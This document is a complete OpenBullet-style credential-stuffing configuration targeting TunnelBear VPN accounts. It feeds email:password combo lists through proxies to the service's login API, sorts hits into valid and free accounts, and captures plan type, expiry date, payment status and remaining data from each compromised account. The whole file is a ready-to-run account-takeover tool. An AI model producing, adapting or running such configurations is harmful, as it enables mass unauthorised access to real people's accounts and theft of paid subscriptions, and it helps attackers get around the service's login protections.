[SETTINGS]
{
  "Name": "Tunnelbear",
  "SuggestedBots": 100,
  "LastModified": "2018-05-06T12:41:34.6964419+02:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#LOGIN REQUEST POST "https://www.tunnelbear.com/core/api/login" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&withUserDetails=true&v=web-1.0" 
  CONTENTTYPE "application/x-www-form-urlencoded;charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.tunnelbear.com/account" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success AND 
    KEY "\"result\":\"PASS\"" 
  KEYCHAIN Failure OR 
    KEY "Access denied" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "\"paymentStatus\":\"FREE\"" 
#CAPTURE_TYPE PARSE "<SOURCE>" LR "\"bearType\":\"" "\"" Recursive=FALSE -> CAP "Type" "" "" 
#CAPTURE_EXPIRATION PARSE "<SOURCE>" LR "fullVersionUntil\":\"" "\"" Recursive=FALSE -> CAP "Expiration" "" "" 
#CAPTURE_PAYMENT_STATUS PARSE "<SOURCE>" LR "\"paymentStatus\":\"" "\"" Recursive=FALSE -> CAP "Payment Status" "" "" 
#CAPTURE_DATACAP PARSE "<SOURCE>" LR "\",\"dataCap\":" "," Recursive=FALSE -> CAP "Data cap" "" "" 
#CAPTURE_DATALEFT PARSE "<SOURCE>" LR "dataLeft\":" "," Recursive=FALSE -> CAP "Data left" "" "" 
